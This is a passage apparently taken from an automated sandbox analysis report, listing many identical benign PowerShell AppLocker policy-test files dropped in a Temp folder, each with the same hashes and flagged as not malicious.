                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_k4aba2x3.w3l.psm1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kw0jizep.a0y.psm1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lw0ljr5y.3mw.ps1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lzm1u10a.q15.ps1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mjeom1wy.okn.ps1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mw3ebrox.soz.psm1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ngdzsn41.hsf.ps1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nxnvxzif.okz.ps1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_o2542lra.swo.psm1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_o4vknoch.24c.psm1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ovb03kkn.2uo.psm1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ovdwsj4g.gni.ps1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pnpfhuha.ivg.ps1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pq3035ch.qbj.psm1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_q55fabph.ol1.psm1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qfpcrhg4.wpu.psm1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qmxkt0qc.zgn.psm1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qr0bs025.aah.ps1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qrnizp2a.lvp.ps1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qxfzb031.mt4.ps1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_r1q00ut0.nxg.psm1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_r3jchahz.d4d.psm1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_r4lmlcwg.res.ps1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ri1weusl.tf0.ps1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_smmghm3s.f4q.ps1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sshmj1ia.njf.ps1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

